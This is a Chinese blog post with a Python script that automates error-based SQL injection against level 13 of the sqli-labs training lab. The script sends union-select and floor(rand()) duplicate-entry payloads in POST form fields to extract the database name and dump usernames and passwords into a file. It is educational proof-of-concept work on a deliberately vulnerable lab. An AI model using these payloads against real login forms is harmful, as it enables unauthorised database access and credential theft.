sqli-labs靶场自动化利用工具——第13关

已于 2024-09-12 18:23:42 修改
阅读量226 收藏 2
点赞数 6
分类专栏: Sqli-Labs靶场自动化利用工具 文章标签: 自动化 网络安全 sql python
于 2024-09-12 18:07:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CSDNagk1/article/details/142182606
版权

文章目录

概要

Sqli-Labs靶场对于网安专业的学生或正在学习网安的朋友来说并不陌生,或者说已经很熟悉。那有没有朋友想过自己开发一个测试脚本能实现自动化化测试sqli-labs呢?可能有些人会说不是有sqlmap,那我们又何须使用这个小脚本呢?这里我统一回答,sqlmap只是一个工具,工具始终是不能代替人的思考。开发这个测试的脚本他都是有针对性的,他是针对每一关的精心设计。但凡脱离实际都是在空想。我也是一直围绕这个主题,所以想到了开发能自动化测试sqli-labs靶场每一关的POC。最后这个只能用于有基础的网安人进行学习,学习网安路还是不能投机取巧的。

本章适合人群:

  1. 网安专业学生
  2. 报班学习网安内容的同学
  3. 提高写POC能力的网安从业者

整体架构流程

因为是sqli-labs的第13关,且我觉得名字很是麻烦,所以我在写脚本的时候错将sqli-labs写成了sql-libs请见谅。如果你有强迫症可以自行修改。

整体流程主要是仿爬虫的形式访问网页,之后将得到的数据记录在和py文件同一级的目录下面。

第13关使用的单引号括号注入。

请求方式是POST请求。

这个脚本唯一的缺陷就是出在后面的find_dbdata函数上面,该处使用不同的正则表达式就会筛选出不同的结果,最终的结果没能拿到我本地部署的sqli-labs靶场的全部数据库名和密码。类似admin1这种用户名和密码筛选出来就可以拿到全部的数据,这个算是这个小脚本的缺陷。有兴趣的小伙伴可以进一步研究。

技术细节

import requests
import re
import os
print("当前工作目录:", os.getcwd())

# 全局变量
url = 'http://sql:8081/Less-13/'


def find_dblength():
    headers = {
        'Host': 'sql:8081',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,'
                  'image/svg+xml,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding': 'gzip, deflate',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Content-Length': '270',  # 根据data参数的长度进行修改
        'Origin': 'http://sql:8081',
        'Connection': 'close',
        'Referer': 'http://sql:8081/Less-13/',
        'Upgrade-Insecure-Requests': '1',
        'Priority': 'u=0, i'
    }
    data = {
        'uname': "username') union select 1,2 from (select count(*),concat((select concat(database()) limit 0,1),"
                 "floor(rand(0)*2)) "
                 "as x from information_schema.tables group by x) as alias-- -",
        'passwd': "') or 1=1-- -"
    }
    response = requests.post(url, headers=headers, data=data, verify=False)
    html_content = response.text
    match = re.search(r"Duplicate entry '([a-zA-Z]+)\d*' for key", html_content)
    if match:
        result = match.group(1)
        result_length = len(result)
        print(f"Result: {result}, Length: {result_length}")
        return result, result_length
    else:
        print("No match found.")
        return None, 0


def find_dbdata(result_length):
    file_path = os.path.join(os.getcwd(), 'result.txt')
    for i in range(result_length):
        headers = {
            'Host': 'sql:8081',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,'
                      'image/svg+xml,*/*;q=0.8',
            'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
            'Accept-Encoding': 'gzip, deflate',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Content-Length': '325',  # 根据data参数的长度进行修改
            'Origin': 'http://sql:8081',
            'Connection': 'close',
            'Referer': 'http://sql:8081/Less-13/',
            'Upgrade-Insecure-Requests': '1',
            'Priority': 'u=0, i'
        }
        data = {
            'uname': f"username') union select 1,2 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,"
                     f"0x3a, 0x3a) from security.users limit {i},1),floor(rand(0)*2)) as x from information_schema.tables "
                     "group by x) as alias-- -",
            'passwd': "') or 1=1-- -"
        }
        response = requests.post(url, headers=headers, data=data, verify=False)
        html_content = response.text
        match = re.search(r"'(.+?)::(.+?)::(\d+)'", html_content)
        if match:
            with open(file_path, "a") as file:
                file.write(f"{match.group(1)}, {match.group(2)}\n")
        else:
            print(f"No match found for entry {i}.")


result, result_length = find_dblength()
if result_length > 0:
    find_dbdata(result_length)

执行效果

小结

由于我的sqli-labs靶场是搭建在我的本机,所以使用代码时需要进行修改。

且想输出不一样的文件内容格式,也可以进行微调整。

最后还是那句话网安的路上不会一帆风顺,还需脚踏实地一步一个脚印的前行,仅用于POC的学习使用,其他使用与作者无关。

转瞬都有
关注
  • 6
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Sqli-labs靶场第11详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1400
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
攻防系列——pikachu靶场练习
weixin_43140411的博客
10-23 2027
从来没有哪个时代的黑客像今天一样热衷于猜解密码 ---奥斯特洛夫斯基
sqli-labs靶场自动化利用工具——第5
转瞬都有的博客
09-11 405
熟悉并掌握sqli-labs靶场的小伙伴可以看过来了,这里是针对每一sqli-labs靶场自动化利用工具,本章节将讲述第5的POC。注意我的Sqli-Labs靶场搭建在我的本机。
sqli-labs靶场自动化利用工具——第6
最新发布
转瞬都有的博客
09-11 360
熟悉并掌握sqli-labs靶场的小伙伴可以看过来了,这里是针对每一sqli-labs靶场自动化利用工具,本章节将讲述第6的POC。注意我的Sqli-Labs靶场搭建在我的本机。
SQL注入18】Sqli-labs靶场1~10思路解析及思考总结——针对GET请求的注入思路
Fighting_hawk的博客
05-11 5593
1. 本文从SQLi-labs前10出发,总结各个卡通过程的思路。 2. 涵盖了联合查询注入、报错注入、布尔盲注和延时盲注四种基本类型。 3. 对比分析了不同参数测试时的用意,以便明确我们的注入思路。 4. 这些卡暂未对输入参数进行过滤,对于采用了保护措施的程序,基本思路正确,也是有可能注入不了的。 .........
sqli-labs-master靶场搭建以及报错解决
qq_53058639的博客
04-14 1629
一.前提准备1.下载:sqli-labs-master。2.安装PHP study。二.搭建靶场1.启动phpstudy。2.将sqli-labs-master.zip解压到phpstudy_pro\WWW,为访问方便我这将其更名为sqli。3.打开我们的sqli。4.在url中的localhost后输入/sqli即可成功进入。5.到这一步,我们的sqli已经搭建成功,此时我们点击发现出错了。三.问题解决。
Web安全漏洞专项靶场SQL注入—docker环境—sqli-labs靶场—详细通指南
qq_38678845的博客
01-22 2164
Web安全SQL注入漏洞的专项训练
安全小记-sqli-labs闯
dzqxwzoe的博客
05-04 311
SQLI,sql injection,我们称之为sql注入。何为sql,英文:Structured QueryLanguage,叫做结构化查询语言。常见的结构化数据库有MySQL,MS SQL,Oracle以及PostgresqlSql语言就是我们在管理数据库时用到的一种。在我们的应用系统使用sql语句进行管理应用数据库时,往往采用拼接的方式形成一条完整的数据库语言,而危险的是,在拼接sql语句的时候,我们可以改变sql语句。从而让数据执行我们想要执行的语句,这就是我们常说的sql注入。
渗透测试练习靶场汇总
Karka_的博客
08-21 827
Vulfocus 官网:在线演示:2.BUUCTF在线评测writeup文章:https://github.com/niudaii/my-vulstack-wphttps: //
sql注入详解
m0_73109590的博客
08-03 1003
SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。...
【评论区抽奖】北大社将《Web安全攻防从入门到精通》送上新书热卖NO.1
hongrisec的博客
10-17 1772
还没看到《Web安全攻防从入门到精通》?那你的第一本安全书籍就交给红日吧,评论区留言,免费看!
自动化立体仓库定义及使用范围
nickelwang的博客
09-10 545
导语大家好,我是社长,老K。专注分享智能制造和智能仓储物流等内容。新书《智能物流系统构成与技术实践》人俱乐部这份文件是自动化立体仓库的定义、发展、组成、技术性能、应用领域、供货方式以及设计步骤的详细介绍。以下是核心内容的概要:定义:自动化立体仓库是一种采用多层货架储存单元货物,并使用物料搬运设备进行货物入库和出库作业的仓库,能够高效利用空间。发展历程:20世纪50年代初,美国出现了采用桥式堆垛...
影刀RPA实战:自动化批量生成条形码完整指南
ddf128的博客
09-08 1342
今天我们聊聊使用影刀来实现批量生成条形码,条形码在零售行业运用非常广泛,主要作用表现在产品识别,库存管理,销售管理,防伪保护等,这些作用使其成为现代商业和工业环境中不可或缺的工具,它极大地提高了数据处理的速度和准确性,降低了运营成本,并提高了整体的工作效率。
PowerShell 脚本编写 :自动化Windows 开发工作流程
小 tom的博客
09-08 1239
PowerShell 是微软开发的一种任务自动化和配置管理框架,由命令行壳和联的脚本语言组成。它为 Windows 用户提供了强大的命令行和脚本工具,能够处理从简单的系统管理任务到复杂的自动化脚本的编写。通过编写 PowerShell 脚本并结合任务计划程序,您可以轻松实现 Windows 系统中日常开发工作流程的自动化。本文介绍的磁盘清理和 MySQL 备份只是自动化工作流的一部分,PowerShell 的强大功能还可以扩展到更多的任务,如文件同步、日志监控和远程服务器管理等。
【EI会议征稿通知】第十一届机械工程、材料和自动化技术国际会议(MMEAT 2025)
Duckbillduckbill的博客
09-08 752
本次大会旨在汇聚全球机械工程、材料科学及自动化技术的创新学者和行业专家,为他们提供一个卓越的交流与合作平台。随着全球对可持续技术和智能制造需求的不断增加,MMEAT 2025将重点注这些领域的最新发展趋势和未来前景。
自动化焊缝定义程序fe-safe
weixin_43399456的博客
09-05 368
【代码】自动化焊缝定义程序fe-safe。
如何使用Ansible实现CI/CD流水线的自动化
2401_85639015的博客
09-08 1442
CI/CD流水线是一系列自动化的步骤,用于持续集成和持续交付软件代码。CI(持续集成)指的是将代码变更自动集成到主干代码中,并运行自动化测试来验证代码的质量。CD(持续交付)则指将代码自动部署到生产环境或其他目标环境中,确保代码能够快速、稳定地交付给用户。根据项目需求,定义流水线的不同阶段。代码检查:包括静态代码分析、代码格式检查等。构建阶段:编译源代码、打包应用程序。测试阶段:运行单元测试、集成测试等。部署阶段:将应用程序部署到测试环境或生产环境。发布阶段:将应用程序发布给用户,并进行监控和反馈。
自动化采集数据之解决滑动验证码
yj2094632273的博客
09-07 383
对于初级选手和数据需求不大的的数据采集,使用自动化库进行模拟,但是抵不住请求多了还是会蹦验证,所以具备处理验证的能力也是十分有必要的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

转瞬都有

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值